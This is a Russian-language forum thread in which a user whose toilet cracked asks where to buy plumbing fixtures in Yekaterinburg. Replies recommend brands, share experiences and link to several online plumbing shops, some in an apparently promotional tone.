+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Треснул унитаз

Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Машина
    ....

Треснул унитаз

Вчера подо мной треснул унитаз. И винить некого, и ругать некого. Теперь нужно менять. Просмотрел все возможные предложения в ближайшем от меня екатеринбуржском строймаркете, но мне ничего не понравилось. Какие у нас есть хорошие магазины сантехники, а, екатеринбуржцы? Или придется заказывать в интернет-магазине? Хотелось бы купить компакт Сантек.

Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Машина
    .....
    Ну да, тут уж никого и не обвинишь, правда автор? Вообще, компакты сейчас есть во всех магазинах, и фирмы-производители в продаже представлены разные. Унитаз компакт фирмы Сантек можно вот здесь подобрать http://esmag.ru/santehnika/sanfajans/santek-ru-79/ В продаже представлено несколько вариантов, думаю, какой-то один из них вам подойдет.

Мимо проходил Arsenal is on a distinguished road Аватар для Arsenal
    Машина
    ...
    А зачем вам Сантек? Возьмите Грое. У нас вся техника этой фирмы, да, это не самый дешевый вариант, но зато качество проверенное временем.

Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Машина
    .....
    А я купил самый обычный недорогой унитаз. На тот момент старый пришла пора менять, а лишних денег в семейном бюджете не было. Тем не менее, он у нас уже 5 лет и никаких нареканий к качеству у меня нет.

Мимо проходил Eddie1 is on a distinguished road Аватар для Eddie1
    Машина
    Бричка
    Божеее, горе то какое...Держитесь!

GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Машина
    Бричка
    тоже думаем взять новый, куда обратиться за сантехникой?

Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Машина
    Бричка
    Решили, что лучшим вариантом покупки сантехники будет магазин 'Сантехника-Онлайн' https://santehnika-online.ru/ . Мы приобрели у них унитаз с инновационной системой смыва. Выбор товаров поразил, и сотрудники компании помогли нам сделать правильный выбор. Доставка была оперативной, и унитаз оказался высококачественным.

Мимо проходил Qweder is on a distinguished road Аватар для Qweder
    Машина
    VW
    Цитата Сообщение от Arsenal Посмотреть сообщение
    А зачем вам Сантек? Возьмите Грое. У нас вся техника этой фирмы, да, это не самый дешевый вариант, но зато качество проверенное временем.
    Вот тут я с вам полностью согласен. И не потому, что именно эта фирма хороша, а в целом речь о том, что сантехнику надо покупать хорошего качества. Ведь качественная сантехника может прослужить вам долгие годы, не требуя замены или ремонта. Это сэкономит вам время, деньги и усилия на поддержание ее в рабочем состоянии. Так что можно сказать, что покупка хорошей сантехники является инвестицией в ваше комфортное проживание и безопасность, а также экономит ваши средства в долгосрочной перспективе. Поэтому мой вам совет - покупайте такие вещи в этом магазине элитной сантехники: https://hogart-art.ru

+ Ответить в теме

Ваши права